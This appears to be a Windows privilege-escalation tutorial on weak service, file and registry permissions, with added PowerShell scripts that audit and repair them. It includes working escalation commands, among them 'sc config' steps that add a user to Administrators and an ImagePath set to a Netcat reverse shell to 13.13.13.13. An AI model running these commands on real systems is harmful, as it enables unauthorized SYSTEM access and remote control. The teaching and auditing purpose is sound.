Weak Permissions

Here are examples of weak permissions abuse and how to spot each case.

Permissive File System ACLs

Running SharpUp

  • Tool: SharpUp from GhostPack to check for weak ACLs.

PS C:\> .\SharpUp.exe audit
  • Example vulnerable service:

    • Name: SecurityService

    • Path: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking Permissions with icacls

PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
  • Output shows Everyone and BUILTIN\Users have Full Control.

Replacing the Service Binary with a Malicious One

C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService
  • Because the file is writable by everyone, the binary can be replaced with a malicious one; starting the service then runs it with SYSTEM privileges.

Weak Service Permissions

Checking Modifiable Services with SharpUp

C:\> SharpUp.exe audit
  • Example vulnerable service:

    • Name: WindscribeService

    • Path: "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with accesschk

C:\> accesschk.exe /accepteula -quvcw WindscribeService
  • NT AUTHORITY\Authenticated Users has SERVICE_ALL_ACCESS (full control).

Changing the Service Binary Path

C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"
  • Grants user ven17 administrator rights.

Stopping & Starting the Service

C:\> sc stop WindscribeService
C:\> sc start WindscribeService
  • Restarting the service executes the new binary path.

Confirming Privilege Escalation

C:\> net localgroup administrators
  • Verify that ven17 was added to the Administrators group.

Resetting the Binary Path (Cleanup)

C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService
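The condition accesschk reports above (a broad principal holding SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on the service object) can be checked across every installed service from the defender's side. The script below is an added example, not part of the original notes or of SharpUp/accesschk: it reads each service's security descriptor with sc.exe sdshow, parses the SDDL DACL, and lists services where Everyone, Users, Authenticated Users or Interactive can change the configuration or the ACL. The function names (Get-ServiceSddl, Get-WeakServiceAces) are my own; run it from an elevated PowerShell prompt.

```powershell
# Added example (not from the original notes): list services whose DACL grants
# configuration rights to broad principals, the weakness accesschk reports above
# as SERVICE_ALL_ACCESS / SERVICE_CHANGE_CONFIG. Run from an elevated prompt.

# SDDL abbreviations for SIDs that cover every logged-on user.
$BroadSids = @('WD', 'BU', 'AU', 'IU')   # Everyone, Users, Authenticated Users, Interactive

# SDDL right codes (with their bit masks) that let the holder rewrite binPath
# or the service's own ACL. Note 'WD' here is a right (WRITE_DAC); as a SID it
# means Everyone.
$DangerousRights = [ordered]@{
    'DC' = @(0x2,        'SERVICE_CHANGE_CONFIG')
    'WD' = @(0x40000,    'WRITE_DAC')
    'WO' = @(0x80000,    'WRITE_OWNER')
    'GW' = @(0x40000000, 'GENERIC_WRITE')
    'GA' = @(0x10000000, 'GENERIC_ALL')
}

function Get-ServiceSddl {
    # sc.exe sdshow prints a blank line followed by the SDDL string.
    param([string]$Name)
    $out = & sc.exe sdshow $Name 2>$null
    return ($out | Where-Object { $_ -match '^D:' } | Select-Object -First 1)
}

function Get-WeakServiceAces {
    # Parse the DACL ACEs out of an SDDL string and return those that give a
    # broad principal a dangerous right. ACE layout: (type;flags;rights;;;sid)
    param([string]$Sddl)
    $findings = @()
    if (-not $Sddl) { return $findings }
    $dacl = ($Sddl -split 'S:')[0]              # drop the SACL section if present
    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $parts = $m.Groups[1].Value -split ';'
        if ($parts.Count -lt 6 -or $parts[0] -ne 'A') { continue }   # allow ACEs only
        $rights = $parts[2]; $sid = $parts[5]
        if ($BroadSids -notcontains $sid) { continue }
        $bad = foreach ($code in $DangerousRights.Keys) {
            $bit, $label = $DangerousRights[$code]
            if ($rights -match '^0x') {
                # Numeric rights mask, e.g. 0x1234
                if (([Convert]::ToInt64($rights.Substring(2), 16) -band $bit) -ne 0) { $label }
            } elseif ($rights -match ('^(?:..)*' + $code)) {
                # Run of two-letter codes, e.g. CCDCLCSWRPWPDTLOCRSDRCWDWO; match on an even offset
                $label
            }
        }
        if ($bad) {
            $findings += [pscustomobject]@{ Principal = $sid; Rights = ($bad -join ',') }
        }
    }
    return $findings
}

# Audit every installed service and print the weak entries.
$results = foreach ($svc in Get-Service) {
    foreach ($ace in Get-WeakServiceAces (Get-ServiceSddl $svc.Name)) {
        [pscustomobject]@{ Service = $svc.Name; Principal = $ace.Principal; Rights = $ace.Rights }
    }
}
$results | Format-Table -AutoSize
```

Any row in the output is a service a standard user could reconfigure exactly as shown with sc config above; the fix is to tighten the DACL (sc.exe sdset with a descriptor that drops DC/WD/WO for the broad SID) or to remove the offending ACE through the vendor's installer.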

Unquoted Service Path

  • If a service binary path contains spaces and is not enclosed in quotes, Windows tries each space-delimited prefix as an executable and may run an unintended binary.

  • Example vulnerable service:

    C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
  • Windows may execute:

    • C:\Program.exe

    • C:\Program Files\System.exe

Finding Unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
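wmic is deprecated on current Windows releases, so here is a PowerShell equivalent of the one-liner above, paired with a fix that quotes the executable in the service's ImagePath value. This is an added example, not part of the original notes; the functions Get-UnquotedServicePath and Repair-UnquotedServicePath are my own names, and the repair supports -WhatIf so the change can be previewed before it is written.

```powershell
# Added example (not from the original notes): PowerShell equivalent of the wmic
# one-liner above, plus a -WhatIf-capable fix that quotes the executable path in
# the service's ImagePath value. Run from an elevated prompt.
function Get-UnquotedServicePath {
    # Auto-start services outside C:\Windows whose executable path contains a
    # space and is not wrapped in quotes.
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.StartMode -eq 'Auto' -and
            $_.PathName -notlike '"*' -and
            $_.PathName -notlike 'C:\Windows\*'
        } |
        ForEach-Object {
            # Separate the .exe from its arguments so that only the path gets quoted.
            $m = [regex]::Match($_.PathName, '^(?<exe>.+?\.exe)(?<rest>.*)$', 'IgnoreCase')
            $exe  = if ($m.Success) { $m.Groups['exe'].Value } else { $_.PathName }
            $rest = if ($m.Success) { $m.Groups['rest'].Value } else { '' }
            if ($exe -match '\s') {
                [pscustomobject]@{
                    Name      = $_.Name
                    PathName  = $_.PathName
                    Exe       = $exe
                    Arguments = $rest
                }
            }
        }
}

function Repair-UnquotedServicePath {
    # Rewrite ImagePath as "exe" followed by the original arguments. Pipe
    # Get-UnquotedServicePath into it; use -WhatIf first to preview the change.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$Name,
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$Exe,
        [Parameter(ValueFromPipelineByPropertyName)][string]$Arguments = ''
    )
    process {
        $quoted = '"{0}"{1}' -f $Exe, $Arguments
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
        if ($PSCmdlet.ShouldProcess($Name, "Set ImagePath to $quoted")) {
            # ImagePath is normally REG_EXPAND_SZ; keep that type when rewriting it.
            Set-ItemProperty -Path $key -Name ImagePath -Value $quoted -Type ExpandString
        }
    }
}

Get-UnquotedServicePath | Format-Table Name, PathName -AutoSize
# Preview, then apply without -WhatIf once the list looks right:
# Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

The repair only wraps the executable, leaving any arguments after it untouched, which is the same shape sc config binpath= expects in the cleanup step earlier on this page.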

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services
  • Example vulnerable service: ModelManagerService

  • The key's ACL allows the user to modify its ImagePath value.

Changing ImagePath with PowerShell

PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"
  • Starting the service then executes the Netcat reverse shell.
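The registry side of this check (the accesschk -kvuqsw run above) can be reproduced with Get-Acl so that every service key is inspected, not only the ones a single user happens to hold rights on. This is an added example and not part of the original notes; Get-WeakServiceRegistryAcl is my own function name, and the principal list and rights mask are my choices for "writable by any logged-on user".

```powershell
# Added example (not from the original notes): enumerate service registry keys
# whose ACL lets broad principals change values such as ImagePath, the weakness
# accesschk -kvuqsw reports above. Run from an elevated prompt.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# RegistryRights bits that allow rewriting ImagePath or the key's own ACL:
# SetValue | CreateSubKey | Delete | ChangePermissions | TakeOwnership
$RegWriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000

function Get-WeakServiceRegistryAcl {
    param([string]$Root = 'HKLM:\SYSTEM\CurrentControlSet\Services')
    foreach ($key in Get-ChildItem -Path $Root -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            $rights  = [int]$ace.RegistryRights
            # Inherited ACEs can carry GENERIC_ALL / GENERIC_WRITE instead of specific bits.
            $generic = $rights -band (0x10000000 -bor 0x40000000)
            if (($rights -band $RegWriteMask) -or $generic) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                    ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                }
            }
        }
    }
}

Get-WeakServiceRegistryAcl | Format-Table -AutoSize
```

Every row is a service whose ImagePath a standard user could rewrite as shown with Set-ItemProperty above; the Inherited column tells you whether the fix belongs on that key or on a parent whose permissions were loosened.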

Modifiable Registry Autorun Binaries

Checking Startup Programs

PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
  • If the attacker can modify a startup binary, they can execute malicious code on user login.
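Both the permissive file system ACL case at the top of this page (a service binary such as SecurityService.exe writable by Everyone) and this startup-command case come down to the same question: can a low-privileged principal rewrite an executable that later runs with higher rights? The script below is an added example, not part of the original notes, SharpUp or icacls: it walks every service binary and every entry from Win32_StartupCommand, resolves the executable from the command line, and reports ACEs that grant write-class rights to Everyone, Users, Authenticated Users or Interactive. The helper names (Get-ExecutablePath, Test-WritableByLowPriv) and the rights mask are my own.

```powershell
# Added example (not from the original notes): audit service binaries and
# startup commands for file ACLs that let low-privileged principals modify the
# executable. Run from an elevated PowerShell 5.1+ prompt.

# Principals that should never hold write rights on a privileged binary.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# FileSystemRights bits that allow replacing or rewriting the file:
# WriteData | AppendData | Delete | ChangePermissions | TakeOwnership
$WriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000

function Get-ExecutablePath {
    # Extract the executable from a service/startup command line. Quoted paths
    # are taken verbatim; for unquoted ones, the first token ending in .exe wins.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
        return $null
    }
    $m = [regex]::Match($cmd, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cmd -split '\s+')[0]
}

function Test-WritableByLowPriv {
    # Returns the ACEs on $Path that grant write-class rights to broad principals.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $acl  = Get-Acl -LiteralPath $Path
    $hits = @()
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights  = [int]$ace.FileSystemRights
        # Inherited ACEs may carry GENERIC_ALL / GENERIC_WRITE rather than specific bits.
        $generic = $rights -band (0x10000000 -bor 0x40000000)
        if (($rights -band $WriteMask) -or $generic) {
            $hits += [pscustomobject]@{
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
            }
        }
    }
    return $hits
}

# Collect candidate executables: every service binary and every startup command.
$targets = @()
foreach ($svc in Get-CimInstance Win32_Service) {
    $targets += [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; Command = $svc.PathName }
}
foreach ($run in Get-CimInstance Win32_StartupCommand) {
    $targets += [pscustomobject]@{ Kind = 'Startup'; Name = $run.Name; Command = $run.Command }
}

$findings = foreach ($t in $targets) {
    $exe = Get-ExecutablePath $t.Command
    if (-not $exe) { continue }
    # Startup entries often use %ProgramFiles%-style variables; expand them before Get-Acl.
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    foreach ($hit in Test-WritableByLowPriv $exe) {
        [pscustomobject]@{
            Kind     = $t.Kind
            Name     = $t.Name
            Path     = $exe
            Identity = $hit.Identity
            Rights   = $hit.Rights
        }
    }
}

$findings | Format-Table -AutoSize
```

A Service row is the SecurityService situation from the first section (icacls would show the same Everyone/BUILTIN\Users Full Control entry); a Startup row is the case described just above. The usual fix for either is to remove the broad ACE from the file (and its parent directory, since the Delete right on the folder is enough to swap the file) and leave only SYSTEM and Administrators with write access.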
